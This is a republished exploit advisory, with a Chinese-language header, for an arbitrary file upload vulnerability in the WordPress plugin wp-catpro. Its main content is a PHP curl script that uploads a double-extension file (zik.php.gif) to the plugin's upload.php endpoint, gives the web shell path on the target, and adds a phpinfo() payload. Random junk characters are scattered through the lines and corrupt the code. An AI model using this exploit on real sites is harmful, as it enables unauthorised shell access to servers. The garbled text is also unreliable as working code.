WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
* R6 c. e: |2 y#-----------------------------------------------------------------------
( v9 Q$ o. ?% I# q. W1 [
作者  => Zikou-16
邮箱 => zikou16x@gmail.com
2 q4 T* m3 s  i- E( w测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit 信息:
------------------
6 ^, |: y/ E5 R6 F2 h0 u' d  Q# 攻击者可以上传 file/shell.php.gif
# k" b# R: G$ D# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
- T. _" s$ m/ z& b* t" h# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
' l- x; n9 [7 S1 y- V  x0 U
#=> Exploit
-----------
: d4 }  Y& S! C  z<?php
' y, _3 _5 Z1 S7 D/ j2 _9 a
7 i: z' B! h9 T3 r8 P$uploadfile="zik.php.gif";
: B% C9 J$ ]* V/ T& [7 U$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
* G& b1 T7 r" ^curl_setopt($ch, CURLOPT_POST, true);
( I4 {9 R2 R. G4 ~  [. Zcurl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
; U! C2 C; y4 e! f. m7 t9 Kcurl_close($ch);

print "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
. k7 R1 j) B8 p) h. Y" Y. V8 f# {+ z<?php
phpinfo();
/ ~6 Q- d2 s, K% [& w?>